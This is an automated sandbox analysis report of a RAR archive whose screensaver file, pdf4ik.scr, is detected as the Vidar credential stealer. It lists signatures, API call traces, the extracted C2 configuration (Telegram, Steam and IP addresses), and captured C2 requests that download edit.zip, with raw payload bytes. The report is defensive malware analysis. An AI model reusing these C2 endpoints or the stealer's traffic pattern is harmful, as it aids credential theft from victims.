Windows Analysis Report
pdf_novichki.rar

Overview

General Information

Sample Name: pdf_novichki.rar
Analysis ID: 829691
MD5: 214c47a7948ca5d3834c3f21cd1cc208
SHA1: 865f07f62dcf68c9929baf4890328e32d7f923fa
SHA256: 0a5e037e5954adb680c726089439539073993e2e1114a9ca9e6932e7dd702d9e
Infos:

Detection

Vidar
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Antivirus detection for dropped file
Drops PE files with a suspicious file extension
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Contains functionality to compare user and computer (likely to detect sandboxes)
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Abnormal high CPU Usage
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Classification

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Avira: detection malicious, Label: WORM/Lodbak.Gen2
Source: 12.2.pdf4ik.scr.29d80000.1.unpack Malware Configuration Extractor: Vidar {"Botnet": "3", "C2 url": ["https://t.me/zaskullz", "https://steamcommunity.com/profiles/76561199486572327"]}
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D94697 lstrcatA,lstrcatA,lstrcatA,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,_memset,lstrcatA,lstrcatA,lstrcatA,KiUserExceptionDispatcher,CryptBinaryToStringA,GetProcessHeap,HeapAlloc,_memset,CryptBinaryToStringA,CreateThread,CreateThread,Sleep,Sleep,CreateThread,Sleep, 12_2_29D94697
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D98FB0 _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA, 12_2_29D98FB0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D991B0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 12_2_29D991B0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D85010 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 12_2_29D85010
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D99210 CryptUnprotectData,LocalAlloc,_memmove,LocalFree, 12_2_29D99210
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D994A0 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove, 12_2_29D994A0
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9B960 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 12_2_29D9B960
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D93B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 12_2_29D93B60
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA4C40 FindFirstFileW,FindNextFileW,FindNextFileW, 12_2_29DA4C40
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9CE80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 12_2_29D9CE80
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D96160 _memset,_memset,SHGetFolderPathA,lstrcatA,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 12_2_29D96160
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D90130 wsprintfA,FindFirstFileA,_memset,lstrcatA,StrCmpCA,StrCmpCA,lstrcpy,lstrcatA,lstrcatA,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 12_2_29D90130
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9E060 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose, 12_2_29D9E060
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D8F3E0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcatA,lstrlenA, 12_2_29D8F3E0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9B520 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose, 12_2_29D9B520
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D964B0 _memset,SHGetFolderPathA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,SHGetFolderPathA,wsprintfA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 12_2_29D964B0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9E470 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA, 12_2_29D9E470
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D90880 _memset,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,SHGetFolderPathA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetUserNameA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,StrStrA,lstrcpyn,wsprintfA,lstrcpy,lstrlenA, 12_2_29D90880

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://t.me/zaskullz
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199486572327
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 116.203.13.130 116.203.13.130
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /zaskullz HTTP/1.1X-Id: 14ac9d852bc10b98f94de36f839b2f59User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic HTTP traffic detected: GET / HTTP/1.1X-Id: 14ac9d852bc10b98f94de36f839b2f59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37Host: 116.203.13.130
Source: global traffic HTTP traffic detected: GET /edit.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37Host: 116.203.13.130Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 18 Mar 2023 20:39:15 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 20.224.151.203
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 52.109.88.191
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 20.224.151.203
Source: unknown TCP traffic detected without corresponding DNS query: 52.109.88.191
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130
Source: pdf4ik.scr, 0000000C.00000003.2359804569.0000000001607000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130
Source: pdf4ik.scr, 0000000C.00000002.2416733096.0000000001616000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130/
Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130/edit.zip
Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130/edit.zip9
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130/edit.zip:D
Source: pdf4ik.scr, 0000000C.00000002.2415135723.0000000001453000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130/edit.zipcac5b60b5e28992247664-7ff3f708-074b-4ff4-b2c5-87e7-806e6f6e6963
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130/edit.zipvqD
Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130/edit.zipx
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130/oI
Source: pdf4ik.scr, 0000000C.00000002.2424739839.000000002BAB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130z
Source: pdf4ik.scr, pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://135.181.87.234:80
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: pdf4ik.scr, 0000000C.00000003.2359804569.0000000001613000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2416733096.0000000001621000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: pdf4ik.scr, 0000000C.00000003.2359804569.0000000001613000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: pdf4ik.scr, pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199486572327
Source: pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199486572327http://135.181.87.234:80update.zip;open_open
Source: OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000002.1469379781.000002C74D244000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/:
Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/X
Source: pdf4ik.scr, pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2424739839.000000002BAB0000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000003.2359804569.0000000001607000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/zaskullz
Source: pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://t.me/zaskullzfunkstaredit.zipMozilla/5.0
Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000002.1469379781.000002C74D244000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/88.0.1/releasenotes
Source: unknown DNS traffic detected: queries for: t.me
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D91560 DeleteUrlCacheEntry,DeleteUrlCacheEntry,InternetOpenA,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 12_2_29D91560
Source: global traffic HTTP traffic detected: GET /zaskullz HTTP/1.1X-Id: 14ac9d852bc10b98f94de36f839b2f59User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic HTTP traffic detected: GET / HTTP/1.1X-Id: 14ac9d852bc10b98f94de36f839b2f59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37Host: 116.203.13.130
Source: global traffic HTTP traffic detected: GET /edit.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37Host: 116.203.13.130Cache-Control: no-cache
